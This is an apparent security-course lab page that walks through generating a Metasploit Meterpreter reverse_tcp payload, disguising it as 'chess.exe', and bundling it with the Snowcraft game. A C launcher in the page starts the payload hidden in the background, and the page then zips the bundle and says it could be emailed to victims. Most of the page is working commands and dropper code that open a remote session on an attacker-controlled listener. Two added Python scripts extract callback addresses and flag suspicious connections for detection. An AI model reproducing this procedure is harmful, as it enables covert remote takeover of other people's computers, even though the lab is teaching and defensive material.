ComputerSecurityStudent (CSS)

(Trojan Horse 2: Lesson 1)

{ How to create and bundle the metasploit msfpayload reverse_tcp }

Section 0. Background Information
  • Pre-Requisite Lab


  • Overview
    • This lab is very similar to Trojan Horse Lesson 1.
    • The big difference is that the program bundled with the game is a Metasploit Meterpreter payload (windows/meterpreter/reverse_tcp) that connects back to the BackTrack server, where a Metasploit multi/handler listener is waiting for it.


  • Caveats
    • The victim must be able to reach your BackTrack server on TCP port 4444: either (1) the BackTrack server is on the same subnet as the victim host, OR (2) it has a public internet address and TCP port 4444 is forwarded through your firewall/router to the BackTrack server. Whichever address the victim can reach is the address you must use for LHOST in Section 2.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
Section 1. Start Up BackTrack5R1
  1. Start Up BackTrack5R1.
    • Instructions:
      1. Start Up your VMware Player
      2. Play virtual machine


  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.


  3. Bring up the GNOME
    • Instructions:
      1. Type startx


  4. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window


Section 2. Create msfpayload windows/meterpreter/reverse_tcp
  1. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • Note the inet addr of the interface that faces the victim network. In your case, the IP address will probably be different from mine.
      • You will use this IP address as LHOST when you create the payload and start the listener (Steps 2 and 6), and again when the Windows client downloads the Trojan Horse payload from this BackTrack machine's web server over HTTP.


  2. Create the msfpayload
    • Instructions:
      1. msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 x > /var/www/html/games/chess.exe
    • Notes:
      • windows/meterpreter/reverse_tcp is the msfpayload: a staged Meterpreter payload in which the victim makes an outbound TCP connection to the attacker.
      • LHOST is the IP address of the BackTrack server that the victim will connect back to (the address you obtained in Step 1).
      • LPORT is the TCP port on that address that the victim will connect to; it must match the LPORT you set on the listener in Step 6.
      • x selects executable output; the redirect writes it into a directory served by Apache so the Windows machine can download it. The games directory must already exist (mkdir -p /var/www/html/games if it does not), and it must not be writable by the web server user.


  3. Verify payload was created
    • Instructions:
      1. ls -l /var/www/html/games/chess.exe
      2. file /var/www/html/games/chess.exe
        • The file command should report a PE32 executable for MS Windows; a zero-length file means msfpayload failed (usually a bad LHOST or a missing directory).
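A size check only proves that something was written. The script below is an added example, not part of the lab page, that recovers the callback address from the generated file so you can confirm it really calls back to the LHOST and LPORT you typed. It assumes the layout of the unencoded x86 reverse_tcp stager, which builds its sockaddr_in with two immediate pushes: push host (0x68 followed by the four address bytes in dotted-quad order) immediately followed by push AF_INET|port (0x68 0x02 0x00 followed by the port in network byte order). The sample bytes, the 192.168.1.105 address and the PIDs are constructed for the example; a payload run through msfencode, or a non-x86 payload, will not match and the check reports nothing.

```python
import re
import socket
import struct
import sys

# Added example (not part of the lab page): pull the callback address out of
# an unencoded x86 windows/meterpreter/reverse_tcp payload and confirm it is
# the LHOST/LPORT you passed to msfpayload.  Assumption about the stager
# layout: it builds the sockaddr_in with two immediate pushes,
#   push <host>           -> 68 + 4 host bytes, in dotted-quad order
#   push <AF_INET|port>   -> 68 02 00 + 2 port bytes, network byte order
# so those bytes appear back to back in the file.  An msfencode'd payload,
# or a non-x86 one, will not match and this check will report nothing.

STAGER_RE = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)

def extract_callbacks(data):
    """Return [(ip, port), ...] for every sockaddr_in push pair found in data."""
    found = []
    for m in STAGER_RE.finditer(data):
        ip = socket.inet_ntoa(m.group(1))
        port = struct.unpack("!H", m.group(2))[0]
        found.append((ip, port))
    return found

def verify_payload(data, lhost, lport):
    """True only if data calls back to exactly lhost:lport."""
    return (lhost, int(lport)) in extract_callbacks(data)

def sockaddr_push(lhost, lport):
    """Build the two-push fragment for lhost:lport.  Used here only to construct
    the sample; for a real chess.exe you read the bytes from the file instead."""
    return b"\x68" + socket.inet_aton(lhost) + b"\x68\x02\x00" + struct.pack("!H", lport)

# Constructed sample: fake PE prefix, NOP filler, the stager fragment for
# LHOST=192.168.1.105 LPORT=4444 (made-up address), then mov esi,esp (89 e6)
# and padding.
SAMPLE_EXE = (b"MZ" + b"\x90" * 32 + sockaddr_push("192.168.1.105", 4444)
              + b"\x89\xe6" + b"\x00" * 32)

if __name__ == "__main__":
    # usage: python check_payload.py /var/www/html/games/chess.exe <LHOST> <LPORT>
    if len(sys.argv) == 4:
        data = open(sys.argv[1], "rb").read()
        lhost, lport = sys.argv[2], int(sys.argv[3])
    else:
        data, lhost, lport = SAMPLE_EXE, "192.168.1.105", 4444
    for ip, port in extract_callbacks(data):
        print("callback found: %s:%d" % (ip, port))
    print("matches %s:%d -> %s" % (lhost, lport, verify_payload(data, lhost, lport)))
```

Run it against the real chess.exe with the LHOST and LPORT you used; the same extraction also works the other way round during incident response, to read the attacker's address out of a captured unencoded stager. Any 0x68-prefixed immediate pair that happens to look like an address will also be reported, so treat extra hits as candidates rather than certainties.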


  4. Start the Apache Webserver
    • Instructions:
      1. cd /etc/init.d
      2. ./apache2 start


  5. Start Up Metasploit msfconsole
    • Instructions:
      1. Applications --> BackTrack --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole.
    • Note:
      • Metasploit takes about 5 to 20 seconds to start up


  6. Start Exploit listener
    • Instructions:
      1. use exploit/multi/handler
      2. set PAYLOAD windows/meterpreter/reverse_tcp
      3. set LHOST
      4. set LPORT 4444
      5. exploit
      6. Continue to the next section!!!
    • Notes:
      • PAYLOAD, LHOST and LPORT must be exactly the values you used when creating the payload in Step 2; the handler binds to that address and port and waits for the victim to connect in.
      • The handler will sit at "Started reverse handler" until snowcraft2.exe is run on the Windows machine in Section 5. That is expected.
      • If you want the handler to keep accepting sessions after the first one, set ExitOnSession false and run exploit -j instead of exploit.


Section 3. Start Up Windows Machine
  1. Booting up WindowsVulnerable01
    • Instructions:
      1. Start up VMware Player
      2. Select WindowsVulnerable01
      3. Play Virtual Machine
    • Note:
      • For those of you that are not part of my class, WindowsVulnerable01 is a Windows XP Machine.
      • Any version of Windows can be used.
      • Please complete the compiler prerequisite in Section 0.


  2. WindowsVulnerable01 Authentication
    • Instructions:
      1. Login as administrator


  3. Start Up Internet Explorer.
    • Instructions:
      1. On WindowsVulnerable01
      2. Bring Up Internet Explorer
      3. Start --> All Programs --> Internet Explorer


  4. Download the msfpayload you just created
    • Instructions:
      1. In the address bar, browse to the games directory on your BackTrack web server (the directory you wrote chess.exe into in Section 2, Step 2).
        • In my case, the address is my BackTrack IP address.
        • In your case, use the IP address obtained in Section 2, Step 1.
      2. Click on chess.exe
      3. Click on the Save button


  5. Save the msfpayload you just created
    • Instructions:
      1. Navigate to C:\tools\snowcraft2\dir
        • Note: If these directories do not exist, please create them.
      2. Name the file "chess.exe"
      3. Click the Save button


  6. Download Complete
    • Instructions:
      1. Click Close


Section 4. Download Snowcraft
  1. Download snowcraft.exe
    • Instructions:
      1. Use your WindowsVulnerable01's Internet Explorer
      2. Click the "Click Here To Download Snowcraft.exe" link on this lab page
    • Note:
      • Snowcraft is not a virus; it will just serve as a Trojan Horse. This is a great game that I play every year during Christmas time.


  2. Save snowcraft.exe
    • Instructions:
      1. Navigate to C:\tools\snowcraft2\dir
      2. Name the file snowcraft.exe
      3. Click the Save Button


  3. Download Complete
    • Instructions:
      1. Click Open Folder


  4. Verify your work
    • Instructions:
      1. In C:\tools\snowcraft2\dir
      2. You should have snowcraft.exe and chess.exe (a/k/a, msfpayload)


Section 5. Start up the CodeBlocks IDE
  1. Start up your CodeBlocks IDE
    • Instructions:
      1. Start --> All Programs --> CodeBlocks --> CodeBlocks


  2. Create an Empty File
    • Instructions
      1. File --> New --> Empty file


  3. Save Empty File
    • Instructions:
      1. File --> Save file as...


  4. Save file
    • Instructions:
      1. Navigate to C:\tools\snowcraft2
      2. Name the file "snowcraft2.cpp"
      3. Save as type: C/C++ files
      4. Click Save


  5. Cut and Paste Code into the CodeBlocks IDE
    • Instructions:
      1. Highlight the below code
      2. Right Click --> Copy
      3. Paste into the CodeBlock Window (See Below)
    • Code:
      • #include <stdio.h>
        #include <stdlib.h>

        int main ()
        {
            /* start /B launches dir\chess.exe (the payload) with no new window and returns at once */
            system("start /B dir\\chess.exe");
            /* then run the game itself; both paths are relative to the folder snowcraft2.exe is run from */
            system("dir\\snowcraft.exe");
            return 0;
        }
    • Note:
      • start /B starts chess.exe (the msfpayload) without creating a new window, and the start command returns immediately, so the payload runs in the background while the game comes up. The second system() call launches the real game so the victim sees nothing unusual.
      • In a C string "\\" is a single backslash, so dir\\chess.exe is the path dir\chess.exe, i.e. the dir sub-folder you saved chess.exe and snowcraft.exe into. Because the paths are relative, snowcraft2.exe must be run from C:\tools\snowcraft2 (which is what happens when it is double-clicked there); run from anywhere else, chess.exe is simply not found.


  6. Save snowcraft2
    • Instructions:
      1. File --> Save File


  7. Compile current file
    • Instructions:
      1. Build --> Compile Current file
    • Note:
      • In the Build log tab, you will see a Build log message.
      • If there are no errors, you will see a message similar to below, saying you have 0 errors.
      • If you received even one error, then you cannot continue to the next step.


  8. Build and run
    • Instructions:
      1. Build --> Build and run


  9. Build and View Results
    • Instructions:
      1. You should see that Snowcraft was kicked off
      2. Play the game if you want.
      3. When you get bored continue to the next step.


  10. View Connection Request Sent to BackTrack
    • Note:
      1. Go over to your BackTrack Machine
      2. In msfconsole you should see the handler report a connection from the Windows machine and a Meterpreter session opened between BackTrack and the Windows machine.
      3. Your IP addresses will be different.


  11. Bring up task manager
    • Instructions:
      1. Go back over to your Windows Machine
      2. Right click on bottom task bar
      3. Select Task Manager


  12. View Task Manager Processes
    • Note:
      1. Notice that chess.exe (a/k/a msfpayload) is running
      2. Also the Trojan Horse Game, snowcraft.exe is running.


  13. Open a Command Prompt
    • Instruction:
      1. Start --> All Programs --> Accessories --> Command Prompt


  14. Let's investigate chess.exe process
    • Instruction:
      1. tasklist | findstr chess
        • tasklist is the command-line equivalent of Windows Task Manager.
        • findstr is like the unix grep command; here we keep only the lines containing "chess".
        • NOTE: In my case, the PID that was returned was 3808. In your case, it will be different.
      2. netstat -nao | findstr 3808
        • netstat -nao lists all connections and listening ports (-a) in numeric form (-n) together with the owning process ID (-o).
        • findstr then keeps only the lines for the chess.exe PID of 3808.
        • NOTE: You should see one TCP connection in the ESTABLISHED state whose Foreign Address is your BackTrack IP on port 4444, with a random high local port. Nothing on the Windows machine is listening on 4444: with a reverse_tcp payload the victim is the client and opened an outbound connection to the attacker, which is exactly why this kind of payload passes host firewalls that only block inbound connections.
      3. date, press enter twice
      4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • E.g., echo "John Gray"
    • Proof of Lab (Part 1)
      1. Do a PrtScn
      2. Paste into a word document.
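Step 14 is the manual version of a check a responder would script. The following is an added example, not part of the lab, that parses tasklist and netstat -nao output, joins the two on PID, lists every ESTABLISHED TCP connection with the image that owns it, and flags connections to a watched remote port (4444, the Metasploit default). It also answers the question the note above raises, whether anything on the victim is LISTENING on 4444. The two sample outputs are constructed to look like Windows XP output for this lab; the PIDs, addresses and memory figures are made up.

```python
import re

# Added example (not part of the lab): do Step 14 programmatically, joining
# "tasklist" output with "netstat -nao" output on PID and flagging
# ESTABLISHED connections to a watched remote port (4444 is the Metasploit
# default).  Both samples are constructed; PIDs and addresses are made up.

TASKLIST_SAMPLE = """\
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
smss.exe                     548 Console                 0        388 K
svchost.exe                  988 Console                 0      4,940 K
iexplore.exe                1784 Console                 0     19,440 K
snowcraft.exe               3792 Console                 0      8,124 K
chess.exe                   3808 Console                 0      3,212 K
"""

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       988
  TCP    192.168.1.110:1047     192.168.1.105:80       ESTABLISHED     1784
  TCP    192.168.1.110:1052     192.168.1.105:4444     ESTABLISHED     3808
  UDP    0.0.0.0:445            *:*                                     4
"""

# Image names may contain spaces ("System Idle Process"), so anchor on the
# numeric columns to the right instead of splitting on whitespace.
TASKLIST_RE = re.compile(r"^(.+?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")

def parse_tasklist(text):
    """Map PID -> image name."""
    procs = {}
    for line in text.splitlines():
        m = TASKLIST_RE.match(line)
        if m:
            procs[int(m.group(2))] = m.group(1)
    return procs

def parse_netstat(text):
    """One dict per TCP/UDP row.  UDP rows have an empty State column."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue
        state = parts[3] if len(parts) == 5 else ""
        rows.append({"proto": parts[0], "local": parts[1], "foreign": parts[2],
                     "state": state, "pid": int(parts[-1])})
    return rows

def listening_on(netstat_text, port):
    """True if some process on this host is LISTENING on the given TCP port."""
    return any(r["proto"] == "TCP" and r["state"] == "LISTENING"
               and r["local"].rsplit(":", 1)[1] == str(port)
               for r in parse_netstat(netstat_text))

def established_by_process(tasklist_text, netstat_text, watch_ports=(4444,)):
    """One record per ESTABLISHED TCP connection, with the owning image name
    and a flag when the remote port is on the watch list."""
    procs = parse_tasklist(tasklist_text)
    hits = []
    for r in parse_netstat(netstat_text):
        if r["proto"] != "TCP" or r["state"] != "ESTABLISHED":
            continue
        rport = int(r["foreign"].rsplit(":", 1)[1])
        hits.append({"image": procs.get(r["pid"], "<unknown>"), "pid": r["pid"],
                     "local": r["local"], "remote": r["foreign"],
                     "flagged": rport in watch_ports})
    return hits

if __name__ == "__main__":
    for h in established_by_process(TASKLIST_SAMPLE, NETSTAT_SAMPLE):
        print("%-14s pid=%-5d %s -> %s%s" % (h["image"], h["pid"], h["local"],
              h["remote"], "  <-- watched port" if h["flagged"] else ""))
    print("listening on 4444:", listening_on(NETSTAT_SAMPLE, 4444))
```

On a real box, save the two command outputs with tasklist > t.txt and netstat -nao > n.txt and feed the file contents to established_by_process. The watch list is only a hint: a real attacker will not keep the default port, so the more durable signal is an unfamiliar image (here chess.exe, launched from a game folder) holding an outbound connection at all.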


Section 6. Bundle Instructions
  1. Close out the following applications
    • Instructions:
      1. Close the CodeBlocks IDE
      2. Close SnowCraft
      3. Close the Command Prompt


  2. Delete the source and object files
    • Instructions:
      1. Start --> My Computer
      2. Navigate to C:\tools\snowcraft2
      3. Delete snowcraft2.cpp
      4. Delete snowcraft2.o


  3. Zip up the snowcraft2
    • Instructions:
      1. Navigate to C:\tools\snowcraft2
      2. Hold down the Ctrl Key and Left Click on both dir and snowcraft2.exe.
      3. Once Highlighted, Right Click
      4. Send To --> Compressed (zipped) folder


  4. Congratulations
    • Note:
      1. In C:\tools\snowcraft2, you should see a new compressed (zipped) folder.
      2. A malicious person might place this zipped file on their website, and send an email with a web link to the victim.
      3. Once the victim downloads it, unzips it and runs snowcraft2.exe, the game opens while chess.exe silently connects back to the BackTrack server; if the Metasploit handler is listening, the attacker now has a Meterpreter session on the victim's Windows machine.
      4. Pretty Scary Stuff!!!


Section 7. Proof of Lab
  1. Open a Command Prompt
    • Instruction:
      1. Start --> All Programs --> Accessories --> Command Prompt


  2. Verify your handy work
    • Instruction:
      1. cd "C:\tools\snowcraft2"
      2. dir
      3. date, press <Enter> twice
      4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • E.g., echo "John Gray"
    • Proof of Lab:
      1. Do a PrtScn
      2. Paste into the previously created word document
      3. Upload to Moodle.

